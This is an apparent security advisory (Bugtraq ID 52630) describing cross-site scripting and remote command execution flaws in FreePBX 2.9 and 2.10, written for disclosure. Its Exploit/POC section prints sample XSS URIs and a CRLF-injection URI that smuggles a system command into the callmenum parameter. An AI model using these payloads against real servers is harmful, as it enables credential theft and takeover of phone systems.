BID:52630

FreePBX Multiple Cross Site Scripting and Remote Command Execution Vulnerabilities

Info

FreePBX Multiple Cross Site Scripting and Remote Command Execution Vulnerabilities

Bugtraq ID:	52630
Class:	Input Validation Error
CVE:	CVE-2012-4869 CVE-2012-4870
Remote:	Yes
Local:	No
Published:	Mar 20 2012 12:00AM
Updated:	Sep 06 2012 10:30PM
Credit:	Martin Tschirsich
Vulnerable:	freePBX freePBX 2.10 freePBX freePBX 2.9

Not Vulnerable:

Discussion

FreePBX Multiple Cross Site Scripting and Remote Command Execution Vulnerabilities

FreePBX is prone to multiple cross-site scripting vulnerabilities and a remote command-execution vulnerability because it fails to properly sanitize user-supplied input.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials or execute arbitrary commands within the context of the affected application.

FreePBX 2.9.0 and 2.10.0 are vulnerable; other versions may also be affected.

Exploit / POC

FreePBX Multiple Cross Site Scripting and Remote Command Execution Vulnerabilities

Attackers can exploit the cross-site scripting issues by enticing an unsuspecting victim to follow a malicious URI.

The following example input and URIs are available:

Cross-site scripting:

http://www.example.com//panel/index_amp.php?context=[XSS]
http://www.example.com//panel/flash/mypage.php?clid=[XSS]
http://www.example.com//panel/flash/mypage.php?clidname=[base64_encode(XSS)]
http://www.example.com//panel/dhtml/index.php?context=/../%00">[XSS]
http://www.example.com//admin/views/freepbx_reload.php/"</script>[XSS]
http://www.example.com//recordings/index.php?login='>[XSS]

Command Execution:

http://www.example.com//recordings/misc/callme_page.php?action=c&callmenum=[PHONENUMBER] () from-internal/n%0D%0AApplication:%20system%0D%0AData:%20[CMD]%0D%0A%0D%0A

The following example exploits are available:

Command Execution:

/data/vulnerabilities/exploits/52630.py
/data/vulnerabilities/exploits/52630.rb

Solution / Fix

FreePBX Multiple Cross Site Scripting and Remote Command Execution Vulnerabilities

Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].

References

FreePBX Multiple Cross Site Scripting and Remote Command Execution Vulnerabilities

References:

FreePBX Homepage (FreePBX)
FreePBX remote command execution, xss (Martin Tschirsich)